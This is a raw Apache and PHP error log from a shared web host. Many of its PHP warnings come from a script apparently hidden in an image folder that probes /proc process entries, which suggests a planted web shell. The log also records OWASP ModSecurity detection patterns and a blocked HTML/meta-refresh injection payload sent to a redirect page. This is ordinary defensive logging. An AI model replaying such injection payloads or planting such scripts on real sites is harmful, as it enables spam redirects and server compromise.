[Mon May 11 21:36:23.788955 2026] [autoindex:error] [pid 1590352:tid 1590398] [client 71.6.232.20:49532] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/849/task/849/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/849/task/849/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/849/task/849/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/849/task/849/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/849/task/849/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/849/task/849/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:36:38.130194 2026] [security2:error] [pid 1534836:tid 1534894] [client 129.226.217.17:37678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/evaluation/"] [unique_id "agIvxteaRXe5lR8y0ZOiWQAAAVc"]
[Mon May 11 21:36:59.221923 2026] [ssl:error] [pid 1516058:tid 1516110] (EAI 2)Name or service not known: [client 51.68.111.243:29431] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:36:59.222888 2026] [ssl:error] [pid 1516058:tid 1516110] AH01941: stapling_renew_response: responder error
[Mon May 11 21:37:03.937716 2026] [:error] [pid 1516058:tid 1516095] [client 46.151.178.13:47136] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 21:37:06.122710 2026] [security2:error] [pid 1516058:tid 1516104] [client 43.153.54.138:56826] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agIv4iMeXtzav-mi9SzBKQAAAM4"]
[Mon May 11 21:37:24.704608 2026] [ssl:error] [pid 1590352:tid 1590404] (EAI 2)Name or service not known: [client 114.119.151.155:49579] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:37:24.705629 2026] [ssl:error] [pid 1590352:tid 1590404] AH01941: stapling_renew_response: responder error
[Mon May 11 21:37:26.055439 2026] [ssl:error] [pid 1588898:tid 1589210] (EAI 2)Name or service not known: [client 114.119.151.155:49581] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:37:26.055752 2026] [ssl:error] [pid 1588898:tid 1589210] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/65/task/65/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/65/task/65/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/65/task/65/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/65/task/65/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/65/task/65/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/65/task/65/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:38:37.820136 2026] [core:error] [pid 1534836:tid 1534879] [client 66.132.195.45:37282] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:38:37.824202 2026] [core:error] [pid 1534836:tid 1534879] [client 66.132.195.45:37282] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704659/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704659/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704659/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704659/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704659/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704659/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704684/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704684/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704684/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704684/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704684/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704684/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790191/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790191/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790191/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790191/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790191/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790191/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/100/task/100/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/100/task/100/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/100/task/100/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/100/task/100/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/100/task/100/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/100/task/100/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925827/task/2925827/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925827/task/2925827/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925827/task/2925827/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925827/task/2925827/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925827/task/2925827/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925827/task/2925827/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925508/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925508/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925508/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925508/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925508/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925508/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:38:57.603745 2026] [security2:error] [pid 1511173:tid 1511196] [client 170.106.147.63:44266] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIwUfjVc-A-CSptvm2C8wAAAFQ"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704678/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704678/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704678/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704678/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704678/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704678/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704674/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704674/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704674/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704674/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704674/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704674/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925504/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925504/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925504/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925504/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925504/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925504/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704685/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704685/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704685/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704685/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704685/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704685/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925500/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925500/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925500/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925500/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925500/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925500/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3951960/task/3951960/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3951960/task/3951960/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3951960/task/3951960/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3951960/task/3951960/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3951960/task/3951960/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3951960/task/3951960/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704680/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704680/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704680/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704680/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704680/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704680/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:39:12.184901 2026] [authz_core:error] [pid 1516058:tid 1516104] [client 216.73.216.110:11209] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/src/error_log
[Mon May 11 21:39:15.762401 2026] [security2:error] [pid 1588898:tid 1588903] [client 43.135.144.126:55610] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/archives.html"] [unique_id "agIwY6FW67LJTsgN3jT6ogAAAAQ"]
[Mon May 11 21:39:23.745268 2026] [ssl:error] [pid 1590352:tid 1590406] (EAI 2)Name or service not known: [client 114.119.130.109:52035] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:39:23.745315 2026] [ssl:error] [pid 1590352:tid 1590406] AH01941: stapling_renew_response: responder error
[Mon May 11 21:39:24.888409 2026] [ssl:error] [pid 1511173:tid 1511200] (EAI 2)Name or service not known: [client 114.119.130.109:52037] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:39:24.888711 2026] [ssl:error] [pid 1511173:tid 1511200] AH01941: stapling_renew_response: responder error
[Mon May 11 21:40:02.168954 2026] [security2:error] [pid 1590352:tid 1590397] [client 43.159.62.163:53536] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIwkq1q0G_aXAqWauToowAAAIU"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704670/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704670/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704670/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704670/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704670/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704670/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:40:52.914737 2026] [autoindex:error] [pid 1511173:tid 1511188] [client 69.5.169.176:11772] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:40:52.965978 2026] [:error] [pid 1590352:tid 1590398] [client 69.5.169.197:10588] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:41:26.851607 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.858769 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/dmndjn>how to view private instagram profiles 2024</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/dmndjn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.860222 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https:/%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/dmNdjN>how to view private instagram profiles 2024</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/dmNdjN /> found within ARGS:url: http://https:/%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/dmNdjN>how to view private instagram profiles 2024</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/dmNdjN />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.860674 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://cleanuri.com/dmNdjN /> found within ARGS:url: http://https:/%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/dmNdjN>how to view private instagram profiles 2024</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/dmNdjN />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.860951 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https:/%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/dmNdjN>how to view private instagram profiles 2024</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/dmNdjN />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10 [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.869121 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https:/%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/dmNdjN>how to view private instagram profiles 2024</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/dmNdjN />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.869851 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
[Mon May 11 21:41:26.870267 2026] [security2:error] [pid 1588898:tid 1588904] [client 27.34.65.67:41094] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 28 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIw5qFW67LJTsgN3jT7SQAAAAU"], referer: https://piregwan-genesis.com
